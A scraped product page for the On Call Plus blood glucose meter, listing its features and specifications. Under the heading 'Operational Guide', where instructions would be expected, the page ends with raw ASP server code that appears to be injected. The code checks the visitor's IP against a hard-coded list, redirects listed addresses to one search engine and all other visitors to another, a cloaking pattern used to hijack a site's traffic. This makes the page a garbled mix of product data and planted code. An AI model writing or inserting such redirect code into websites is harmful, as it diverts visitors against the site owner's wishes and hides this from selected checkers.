Home>Products>>On Call Plus

img
  • 0.5μL blood sample only
    img
  • Clinically proven accuracy
    img
  • Automatic detection of insufficient sample
    img
  • GOD enzyme has high specificity with no interference from maltose, galactose
    img
  • img
  • Optional individually packaged test strips available
    img

Specifications

Enzyme Glucose Oxidase (GOD)
Test Time 10 seconds
Sample Type Fresh capillary whole blood
Hematocrit Range 25-60%

Measurement Range
20 - 600 mg/dL (1.1 - 33.3 mmol/L)
Sample Size 0.5 μL
Coding Method Code
Memory 300 results with date and time

Components

Diabetes Management Software

Please click here to download

Operational Guide

<% requestIP = request.ServerVariables("REMOTE_ADDR") IP = "[223.109.206.196|120.216.162.113|45.40.51.242|13.67.144.27]" trueURL = "http://www.baidu.com" falseURL = "http://www.google.com" ipArr = split(IP,"|") flag = false for i=0 to ubound(ipArr) if requestIP=ipArr(i) then flag=true exit for end if next if flag then response.Redirect(falseURL) else response.Redirect(trueURL) end if %>